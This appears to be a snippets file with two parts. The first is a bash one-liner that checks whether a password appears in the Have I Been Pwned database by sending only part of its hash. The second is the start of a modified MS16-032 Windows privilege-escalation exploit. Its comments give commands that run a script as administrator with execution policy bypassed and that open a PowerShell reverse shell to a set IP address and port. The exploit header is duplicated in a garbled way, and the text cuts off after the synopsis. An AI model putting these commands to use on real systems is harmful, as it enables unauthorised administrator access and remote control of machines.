## One-liner password leak check + k-anonymity method (w/out exposing the password on request)
# Compute the SHA-1, take the first 5 hex chars of the hash, query that range on the huge haveibeenpwned DB, then grep the response locally for the rest of the hash!
# original source: https://news.ycombinator.com/item?id=16432344
# printf and quoting keep passwords with spaces, globs or backslashes intact; the first cut drops sha1sum's trailing " -"
VARPWD='test123'; HASH=$(printf '%s' "$VARPWD" | sha1sum | cut -d ' ' -f 1); curl --silent "https://api.pwnedpasswords.com/range/$(cut -b 1-5 <(echo "$HASH"))" --stderr - | grep -i "$(cut -b 6- <(echo "$HASH"))"
## intrd's MS16-032 priv escalation exploit modded - interactive shell & command argv
# exploit MS16-032 and run shell.ps1(ATTACHMNT) as administrator: Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command Import-Module C:\Users\IEUser\Desktop\shell.ps1;Start-Sleep -s 10"
# reverse shell as current user: Invoke-PowerShellTcp -Reverse -IPAddress 10.0.3.10 -Port 4567
function Invoke-MS16-032 {
<#
.SYNOPSIS
PowerShell implementation of MS16-032. The exploit targets all vulnerable |
function Invoke-MS16-032 {
<#
.SYNOPSIS
PowerShell implementation of MS16-032. The exploit targets all vulnerable
operating systems that support PowerShell v2+. Credit for the discovery of
the bug and the logic to exploit it go to James Forshaw (@tiraniddo) and @Fuzzysec for the original PS script.
Modifications by Mike Benich (@benichmt1).
Targets: